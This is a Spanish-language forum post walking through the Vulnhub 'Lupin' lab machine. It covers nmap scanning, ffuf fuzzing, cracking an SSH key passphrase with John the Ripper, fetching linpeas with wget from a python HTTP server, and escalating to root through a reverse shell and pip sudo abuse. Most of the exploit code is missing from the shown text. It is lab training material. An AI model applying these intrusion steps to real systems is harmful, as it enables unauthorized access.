WriteUp - Lupin (Vulnhub)

Iniciado por 4NTR4xX, Julio 13, 2024, 01:47:13 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Julio 13, 2024, 01:47:13 PM Ultima modificación: Julio 13, 2024, 03:46:30 PM por AXCESS
Lupin - Vulnhub

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

**ESCANEO DE PUERTOS CON NMAP**

ºnmap -n -sn 192.168.1.0/24  -oG - | awk '/Up$/{print $2}


  ** Este comando nos permite conocer todos los host activos dentro de una red, para poder recopilar mas informacion dentro de una prueba de pentesting


ºsudo nmap -p- --open -sC -sV -Pn -n -sS -T4 192.168.1.72 -o escaneo_de_puertos



  ** A través del escaneo encontramos dos puertos abiertos, el 22 y el 80. En el puerto 80 encontramos un directorio llamado "~myfiles", aquí podemos encontrar nuestro vector de ataque.



**FUERZA BRUTA PARA DIRECTORIOS WEB (FUZZING)**

º Para poder buscar mas directorios en la pagina web utilizaremos la herramienta **ffuf**, esta herramienta nos permite hacer ataques de fuerza bruta ante algún sitio web para poder encontrar directorios escondidos, ataque también conocido como Fuzzing.

  ** ffuf -c -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/common.txt -u 'No tienes permitido ver enlaces. Registrate o Entra a tu cuenta



  ** Hemos descubierto un directorio que se denomina "secret", lo buscamos en el navegador para ver su contenido



- Comenta el usuario icex64 que hay otro directorio oculto, asi que procederemos a realizar un ataque fuerza bruta nuevamente con la informacion ya obtenida, con el fin de encontrar un fichero.

  **ffuf -c -ic -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -u 'No tienes permitido ver enlaces. Registrate o Entra a tu cuenta; -fc 403 -e .txt, .html





  ** Nos dirigimos al archivo "mysecret.txt"




** Encontramos algo con caracteres extraños, vamos a una página que nos puede ayudar a desencriptar el este archivo.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, aquí nos indica que tipo de cifrado tiene, y nos manda que es un base 58, y nos manda una llave RSA nuevamente cifrada para autenticarnos  por ssh (Puerto 22).






**ATAQUE DICCIONARIO**

º Guardaremos la llave en un archivo porque vamos a hacerle un ataque diccionario a la llave para saber cual es la contraseña, y poder loguearnos por **ssh**
º Para poder descifrarla tenemos que convertir a llave a un formato que John The Ripper pueda descifrar, ejecutaremos el comando en nuestra terminal "locate ssh2john", para conocer la ruta de la herramienta que usaremos para poder convertir esta llave.



º Para poder usarla nos ubicaremos en en directorio donde hayamos guardado la llave ssh y ejecutamos el siguiente comando:


** Hash es el nombre del archivo que guardamos y  "sshkey" es el nombre del archivo con el que guardaremos la respuesta de la herramienta.

º Ahora si procedemos a usar "John The Ripper" contra el archivo cifrado.


  ** En este caso usaremos el diccionario llamado "fasttrack.txt"

º De esa manera pudimos encontrar la contraseña y ahora si, podemos autenticarnos por ssh con el usuario icex64



    ** No olvidemos agregar la clave RSA llamado "Hash" (en este caso) para que tengamos una correcta autenticación

º Ya habiéndonos autenticándonos hacemos un listado con el comando "ls" y encontramos la primer bandera.



**ELEVAR PRIVILEGIOS**

º Ya estando dentro de la maquina procederemos  a tratar de elevar privilegios a root, para eso miraremos que alcance tenemos con el comando "sudo -l"



** Procederemos a trata de aprovechar esa propiedad para ello descargaremos el primer archivo de la siguiente pagina.

- No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

- Este archivo nos ayudara a encontrar vulnerabilidades dentro de la maquina en archivo que podamos ejecutar, ahora ya descargando el archivo moveremos a la maquina atacada, para ello abriremos un servidor desde nuestra maquina atacante en python para poder descargar el archivo desde la otra maquina, para ello ejecutaremos el siguiente comando:
- sudo python3 -m http.server



- Es importante ejecutar el comando en donde hayamos guardado el archivo descargado
- Desde la maquina atacada tendremos que descargar el arvhico dentro de la carpeta /temp, para descargarlo ejecutaremos el siguiente comando:
- wget 192.168.1.70:8000/linpeas.sh  (Por el puerto 8000 porque en ese esta corriendo el servidor)



-Habiendo cargado el archivo para poder ejecutarlo tenemos que darle los permisos que necesita con el comando "chmod 777 No tienes permitido ver enlaces. Registrate o Entra a tu cuenta", despues lo ejecutamos con el comando "./linpeas.sh"



- Habiendo hecho esto pudimos encontrar un directorio que esta dentro de las opciones que nos dio la maquina al ejecutar sudo -l



- Para poder aprovechar la vulnerabilidad editaremos el archivo con nano, y al final le pondremos el siguiente codigo para poder obtener una reverse shell


(Esto va al principio del código)




(Esto va al final del código)


- Guardamos el archivo, y ejecutamos de la siguiente manera:

- Al ejecutar esto nos cambia de usuario a "arsene"
- Al estar como "arsene" y ejecuando el comando 'sudo -l' encontramos que tenemos pip para poder elevar a usuario root





- Desde ahí podemos vulnerar para poder acceder como root, para ellos nos iremos a la siguiente pagina `No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
 Ahí podremos encontrar los comandos que necesitamos para explotar esa vulnerabilidad





- Los ejecutamos en nuestra terminal y pasaremos a ser usuarios root



PWNED!!!!!!